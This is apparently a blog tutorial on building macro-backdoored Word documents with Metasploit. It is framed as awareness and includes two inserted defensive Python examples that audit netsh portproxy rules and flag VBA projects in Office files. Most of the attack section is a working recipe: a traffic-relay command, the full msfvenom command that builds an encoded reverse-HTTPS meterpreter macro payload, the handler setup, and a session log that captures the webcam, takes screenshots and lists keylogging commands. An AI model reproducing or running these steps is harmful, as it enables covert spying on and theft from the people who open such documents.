Remote access by creating backdoored office documents

Many treat security as something distant that can't happen to them, partly because they can't see it and partly because they wonder why anyone would even target them.

[Image: computer virus clipart, from http://www.clipartkid.com/images/744/giving-computer-virus-clipart-giving-computer-virus-clip-art-GFNgIY-clipart.gif]

The demonstration below isn't meant to facilitate illegal behaviour but rather to show how easily some of this can be done, and hence to promote awareness and better online habits. It involves zero coding and zero scripting, just some careful reading and a few existing tools. Yes, it really is that easy, so manage your behaviour when it comes to opening attachments and downloading documents from the internet, especially if the document asks you to enable a macro.

Mitigation: antivirus products such as Defender, AVG and Avast were able to detect the malware-ridden files before I could even run them, which further underlines the importance of running an antivirus. That holds for this set of modules; the same framework may gain better antivirus-evasion mechanisms in the future as it evolves. While carrying this out I noticed that the running antiviruses matched these files to existing malware / Trojan signatures. That simply means this technique has been abused before, but it also means attackers can simply move to ready-made tools rather than the scenario where you picture them typing code.

The demonstration shows how to access someone's system, i.e. files, webcam, microphone etc., by infecting Microsoft Office files. To perform it a tool / framework called Metasploit is used. The primary purpose of this framework is to support the security community during authorised penetration and exploitation tests, but some people abuse it. It is built on many CVE (Common Vulnerabilities and Exposures) database entries, which means that each time you hear of a bug in some piece of software there is a fair chance that bug can be moved into such a framework and used either for good or for bad.

This demonstration was carried out using my exploit server in a virtual machine on its own virtual private LAN, so I had to find a way of forwarding traffic from the main computer to the virtual machine. This is an important step because, in exactly the same way, a machine an attacker has accessed can be used to forward traffic to a remote attacker without your knowledge.

My main machine on the general LAN was running Windows 10 and the internal virtual machine was running the latest Kali Linux security distro, current as at 31st Dec 2016.

Using PowerShell (Microsoft Windows Vista and above), I executed the following command on the general LAN machine, where 192.168.10.2 was my address on the general LAN and 192.168.5.2 was the internal virtual machine on my computer, not reachable from the general LAN. It tells Windows to forward traffic arriving on port 443 to my virtual machine in its private LAN.

>netsh interface portproxy add v4tov4 listenaddress=192.168.10.2 listenport=443 connectaddress=192.168.5.2 connectport=443
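Because a portproxy rule like the one above persists across reboots and is exactly what an attacker would leave on a compromised host to relay traffic, it is worth auditing them. The following is an added example (not part of the original post) that parses the output of `netsh interface portproxy show all` and flags rules that listen on every interface or relay to an address outside the networks you trust. The sample output and the trusted network list are constructed for the example; on a real host you would pipe the command's output into `parse_portproxy`.

```python
"""Audit Windows 'netsh interface portproxy' rules from captured output.

Added example, not from the original post. Feed it the text printed by
`netsh interface portproxy show all`; the sample below is constructed to
match netsh's table layout and is not real output from any host.
"""
import ipaddress
import re
from dataclasses import dataclass

# Constructed sample: the first rule mirrors the post's lab setup, the second
# is the kind of rule that should raise eyebrows (wildcard listen, external destination).
SAMPLE_NETSH_OUTPUT = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
192.168.10.2    443         192.168.5.2     443
0.0.0.0         8080        203.0.113.10    443
"""


@dataclass
class PortProxyRule:
    listen_addr: str
    listen_port: int
    connect_addr: str
    connect_port: int


# A data row is four whitespace-separated fields: addr port addr port.
# Header and separator rows never match because their 2nd/4th fields are not digits.
RULE_RE = re.compile(r"^\s*(\S+)\s+(\d+)\s+(\S+)\s+(\d+)\s*$")


def parse_portproxy(text: str) -> list[PortProxyRule]:
    """Extract the v4tov4 rules from netsh's 'show all' output."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        rules.append(PortProxyRule(m.group(1), int(m.group(2)),
                                   m.group(3), int(m.group(4))))
    return rules


def review_rules(rules: list[PortProxyRule], trusted_nets: list[str]) -> list[tuple[PortProxyRule, list[str]]]:
    """Return each rule with the list of reasons it deserves a closer look (empty list = looks benign)."""
    nets = [ipaddress.ip_network(n) for n in trusted_nets]
    findings = []
    for r in rules:
        reasons = []
        if r.listen_addr == "0.0.0.0":
            reasons.append("listens on all interfaces")
        try:
            dest = ipaddress.ip_address(r.connect_addr)
            if not any(dest in n for n in nets):
                reasons.append(f"relays to untrusted address {r.connect_addr}")
        except ValueError:
            # netsh accepts hostnames as connectaddress; resolve and review those by hand.
            reasons.append(f"relays to hostname {r.connect_addr} (resolve and review)")
        findings.append((r, reasons))
    return findings


if __name__ == "__main__":
    for rule, reasons in review_rules(parse_portproxy(SAMPLE_NETSH_OUTPUT), ["192.168.0.0/16"]):
        status = "REVIEW" if reasons else "ok"
        print(f"{status:6} {rule.listen_addr}:{rule.listen_port} -> "
              f"{rule.connect_addr}:{rule.connect_port} {'; '.join(reasons)}")
```

The rules netsh creates are stored under `HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp`, so the same review can be driven from a registry export collected during an investigation, and a host that should never relay traffic should simply have no entries there.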

I used msfvenom to create a payload that automatically initiates a connection back to my attacking server from the infected machine. I like the HTTPS modules because the destination port (443) is most likely open for outbound connections on remote computers and it is also not suspicious.

I had initially opted for “windows/meterpreter/reverse_https”, then switched to “windows/x64/meterpreter_reverse_https” since I was on my own LAN. The difference is actually quite big, so if you have time read the article on the difference between staged and stageless payloads at https://community.rapid7.com/community/metasploit/blog/2015/03/25/stageless-meterpreter-payloads. In summary, reverse_https is very small, carries little code and has to download most of the remaining payload from the attacking server on connection, while meterpreter_reverse_https contains a lot more code and hence doesn't download big chunks from the attacking server, making it a better standalone payload since it has more functionality. The difference in size was 20KB for reverse_https vs 4.6MB for meterpreter_reverse_https.

root@test1:~# msfvenom -a x64 --platform windows -p windows/x64/meterpreter_reverse_https LHOST=192.168.10.2 LPORT=443 -e x86/shikata_ga_nai -f vba-exe > word.txt
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 1190497 (iteration=0)
x86/shikata_ga_nai chosen with final size 1190497
Payload size: 1190497 bytes
Final size of vba-exe file: 4791212 bytes
root@test1:~#

The result had two portions: the macro, to paste into the Visual Basic editor in Office (enable the Developer tools), and the other (Data), to be appended to the bottom of / included in the Word document I wanted to mail.

'**************************************************************
'*
'* This code is now split into two pieces:
'* 1. The Macro. This must be copied into the Office document
'* macro editor. This macro will run on startup.
'*
'* 2. The Data. The hex dump at the end of this output must be
'* appended to the end of the document contents.
'*
'**************************************************************
'*
'* MACRO CODE
'*
'**************************************************************
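The whole attack hinges on a VBA project being present in the document and the recipient enabling it, so the cheapest defensive check is to look for the project before the file ever reaches Office. The following is an added example (not from the original post or from Metasploit): it inspects an Office Open XML package (.docx/.docm and friends, which are zip files) for the `vbaProject.bin` part, either declared in `[Content_Types].xml` with the content type `application/vnd.ms-office.vbaProject` or simply present in the archive, and reports a verdict. The sample documents are constructed in memory and are not real Word files; the verdict strings and the `triage` function are this example's own conventions.

```python
"""Triage an Office Open XML document for an embedded VBA project.

Added example, not code from the original post. Macro-enabled OOXML files
carry their VBA project as the part vbaProject.bin, declared in
[Content_Types].xml; this looks for it without opening the file in Office.
Legacy .doc/.xls files are OLE2 containers, not zips, and are out of scope
here (tools such as oletools' olevba handle those).
"""
import io
import zipfile
from xml.etree import ElementTree as ET

VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"
CT_NS = "http://schemas.openxmlformats.org/package/2006/content-types"
MACRO_EXTENSIONS = (".docm", ".dotm", ".xlsm", ".xltm", ".pptm", ".potm")


def build_sample_doc(with_macro: bool) -> bytes:
    """Construct a minimal docx/docm-shaped zip (sample data for this example only)."""
    overrides = ['<Override PartName="/word/document.xml" '
                 'ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>']
    if with_macro:
        overrides.append(f'<Override PartName="/word/vbaProject.bin" ContentType="{VBA_CONTENT_TYPE}"/>')
    content_types = (f'<?xml version="1.0" encoding="UTF-8"?>'
                     f'<Types xmlns="{CT_NS}">{"".join(overrides)}</Types>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", content_types)
        z.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            # OLE2 magic followed by filler: a stand-in for a real VBA project stream.
            z.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0" + b"\x00" * 60)
    return buf.getvalue()


def find_vba_parts(data: bytes) -> list[str]:
    """Return every part that is declared as, or looks like, a VBA project.

    Both the content-type declaration and the raw file name are checked: an
    undeclared vbaProject.bin is still a VBA project to an analyst, and a
    declared one under an unusual name is still worth seeing.
    """
    if not zipfile.is_zipfile(io.BytesIO(data)):
        raise ValueError("not an OOXML package (legacy OLE2 .doc/.xls need a different parser)")
    found = set()
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
        if "[Content_Types].xml" in names:
            root = ET.fromstring(z.read("[Content_Types].xml"))
            for el in root.iter(f"{{{CT_NS}}}Override"):
                if el.get("ContentType") == VBA_CONTENT_TYPE:
                    found.add(el.get("PartName", "").lstrip("/"))
            for el in root.iter(f"{{{CT_NS}}}Default"):
                if el.get("ContentType") == VBA_CONTENT_TYPE:
                    ext = "." + el.get("Extension", "").lower()
                    found.update(n for n in names if n.lower().endswith(ext))
        found.update(n for n in names if n.lower().endswith("vbaproject.bin"))
    return sorted(found)


def triage(filename: str, data: bytes) -> dict:
    """Classify a document by whether it carries VBA and whether its extension admits to it."""
    parts = find_vba_parts(data)
    if not parts:
        verdict = "clean"
    elif filename.lower().endswith(MACRO_EXTENSIONS):
        verdict = "macro-enabled"
    else:
        verdict = "macro in non-macro extension"
    return {"file": filename, "vba_parts": parts, "verdict": verdict}


if __name__ == "__main__":
    for name, macro in (("report.docx", False), ("invoice.docm", True)):
        print(triage(name, build_sample_doc(macro)))
```

A mail gateway or a download folder watcher can run `triage` on every Office attachment and quarantine anything other than `clean` for review; a document whose extension does not advertise macros but which carries a VBA project deserves the most attention, since that mismatch never happens by accident in normal use.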

On the server side, start the multi/handler, set PAYLOAD to match the payload you created with msfvenom, and kick off the listener.

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_https):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     0.0.0.0          yes       The local listener hostname
   LPORT     443              yes       The local listener port
   LURI                       no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > exploit

[*] Started HTTPS reverse handler on https://0.0.0.0:443
[*] Starting the payload handler...

The moment the receiver gets the document and opens it, it is harmless, but the moment they click on Enable Macros we see a session initiated from their computer to our exploit server. Note that the IP shown is the IP of the port-forwarding host and not the remote machine.

[Image: Office security warning asking to enable macros]

[*] https://0.0.0.0:443 handling request from 192.168.10.2; (UUID: ixboais5) Staging Native payload...
[*] Meterpreter session 1 opened (192.168.5.2:443 -> 192.168.10.2:62907) at 2016-12-26 12:43:30 +0300

meterpreter > sysinfo
Computer        : mainmachine
OS              : Windows 10 (Build 14393).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > webcam_snap
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/llpNhVPk.jpeg
meterpreter > screenshot
Screenshot saved to: /root/QejAYaQS.jpeg
meterpreter >

Some other commands are:

keyscan_dump    Dump the keystroke buffer
keyscan_start   Start capturing keystrokes
keyscan_stop    Stop capturing keystrokes

And there are many more, including port forwarding.
